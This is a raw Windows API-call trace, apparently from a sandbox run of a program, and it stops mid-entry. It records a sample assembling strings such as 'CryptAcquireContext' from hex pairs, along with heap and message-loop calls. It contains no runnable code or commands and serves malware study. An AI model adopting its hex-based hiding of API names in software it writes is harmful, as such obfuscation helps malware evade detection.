lstrlenW (lpString="56") returned 2 [0084.226] lstrlenW (lpString="65") returned 2 [0084.226] lstrlenW (lpString="72") returned 2 [0084.226] lstrlenW (lpString="73") returned 2 [0084.226] lstrlenW (lpString="69") returned 2 [0084.232] lstrlenW (lpString="6F") returned 2 [0084.232] lstrlenW (lpString="6E") returned 2 [0084.232] lstrlenW (lpString="20") returned 2 [0084.232] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.232] lstrlenW (lpString="57") returned 2 [0084.232] lstrlenW (lpString="49") returned 2 [0084.232] lstrlenW (lpString="4E") returned 2 [0084.233] lstrlenW (lpString="5F") returned 2 [0084.234] lstrlenW (lpString="32") returned 2 [0084.234] lstrlenW (lpString="30") returned 2 [0084.234] lstrlenW (lpString="30") returned 2 [0084.234] lstrlenW (lpString="30") returned 2 [0084.235] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.235] lstrlenW (lpString="62") returned 2 [0084.235] lstrlenW (lpString="6F") returned 2 [0084.235] lstrlenW (lpString="6F") returned 2 [0084.235] lstrlenW (lpString="6C") returned 2 [0084.235] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.235] lstrlenW (lpString="43") returned 2 [0084.235] lstrlenW (lpString="72") returned 2 [0084.235] lstrlenW (lpString="79") returned 2 [0084.260] lstrlenW (lpString="70") returned 2 [0084.260] lstrlenW (lpString="74") returned 2 [0084.260] lstrlenW (lpString="41") returned 2 [0084.260] lstrlenW (lpString="63") returned 2 [0084.260] lstrlenW (lpString="71") returned 2 [0084.260] lstrlenW (lpString="75") returned 2 [0084.305] lstrlenW (lpString="69") returned 2 [0084.306] lstrlenW (lpString="72") returned 2 [0084.306] lstrlenW (lpString="65") returned 2 [0084.306] lstrlenW (lpString="43") returned 2 [0084.306] lstrlenW (lpString="6F") returned 2 [0084.306] lstrlenW (lpString="6E") returned 2 [0084.306] lstrlenW (lpString="74") returned 2 [0084.306] lstrlenW (lpString="65") returned 2 [0084.306] lstrlenW (lpString="78") returned 2 [0084.306] lstrlenW (lpString="74") returned 2 [0084.306] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.306] lstrlenW (lpString="68") returned 2 [0084.306] lstrlenW (lpString="61") returned 2 [0084.306] lstrlenW (lpString="6E") returned 2 [0084.306] lstrlenW (lpString="64") returned 2 [0084.306] lstrlenW (lpString="6C") returned 2 [0084.306] lstrlenW (lpString="65") returned 2 [0084.306] lstrlenW (lpString="2A") returned 2 [0084.306] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.306] lstrlenW (lpString="20") returned 2 [0084.306] lstrlenW (lpString="30") returned 2 [0084.306] lstrlenW (lpString="20") returned 2 [0084.306] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.306] lstrlenW (lpString="70") returned 2 [0084.307] lstrlenW (lpString="74") returned 2 [0084.307] lstrlenW (lpString="72") returned 2 [0084.307] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.307] lstrlenW (lpString="20") returned 2 [0084.307] lstrlenW (lpString="30") returned 2 [0084.307] lstrlenW (lpString="20") returned 2 [0084.307] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.307] lstrlenW (lpString="70") returned 2 [0084.307] lstrlenW (lpString="74") returned 2 [0084.307] lstrlenW (lpString="72") returned 2 [0084.307] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.307] lstrlenW (lpString="20") returned 2 [0084.307] lstrlenW (lpString="30") returned 2 [0084.307] lstrlenW (lpString="20") returned 2 [0084.307] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.307] lstrlenW (lpString="64") returned 2 [0084.307] lstrlenW (lpString="77") returned 2 [0084.307] lstrlenW (lpString="6F") returned 2 [0084.307] lstrlenW (lpString="72") returned 2 [0084.307] lstrlenW (lpString="64") returned 2 [0084.307] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.307] lstrlenW (lpString="64") returned 2 [0084.340] lstrlenW (lpString="77") returned 2 [0084.340] lstrlenW (lpString="6F") returned 2 [0084.340] lstrlenW (lpString="72") returned 2 [0084.340] lstrlenW (lpString="64") returned 2 [0084.340] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.341] lstrlenW (lpString="20") returned 2 [0084.341] lstrlenW (lpString="30") returned 2 [0084.341] lstrlenW (lpString="20") returned 2 [0084.341] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.377] TranslateMessage (lpMsg=0x8cefc8) returned 0 [0084.377] DispatchMessageW (lpMsg=0x8cefc8) returned 0x0 [0084.377] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0084.377] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0084.377] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77580 [0084.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec808 [0084.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72918 [0084.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec898 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72888 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72888 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72888 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0084.378] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72888 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a48 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a18 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729d8 [0084.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729d8 | out: hHeap=0x2af0000) returned 1 [0084.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecaf0 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecad8 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a18 | out: hHeap=0x2af0000) returned 1 [0084.379] lstrlenW (lpString="20") returned 2 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a48 | out: hHeap=0x2af0000) returned 1 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729d8 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729d8 | out: hHeap=0x2af0000) returned 1 [0084.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecad8 | out: hHeap=0x2af0000) returned 1 [0084.379] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.379] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0084.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ac8 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b78 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b78 | out: hHeap=0x2af0000) returned 1 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eceb0 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729d8 [0084.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd48 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecaf0 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0084.380] lstrlenW (lpString="32") returned 2 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eceb0 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729d8 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecad8 | out: hHeap=0x2af0000) returned 1 [0084.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b48 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.381] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.381] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a78 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a18 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd48 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ae8 [0084.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd60 [0084.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.382] lstrlenW (lpString="20") returned 2 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ae8 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd60 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecaf0 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a18 | out: hHeap=0x2af0000) returned 1 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b98 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecad8 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a78 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecaf0 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.382] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0084.382] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b78 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b78 | out: hHeap=0x2af0000) returned 1 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecad8 | out: hHeap=0x2af0000) returned 1 [0084.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec868 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7c0 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ea90 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72858 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ecc0 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec898 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec808 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72918 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77580 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec910 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7d8 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77990 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72878 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5c08 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727b8 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec520 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec598 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6a0 | out: hHeap=0x2af0000) returned 1 [0084.383] RtlAllocateHeap 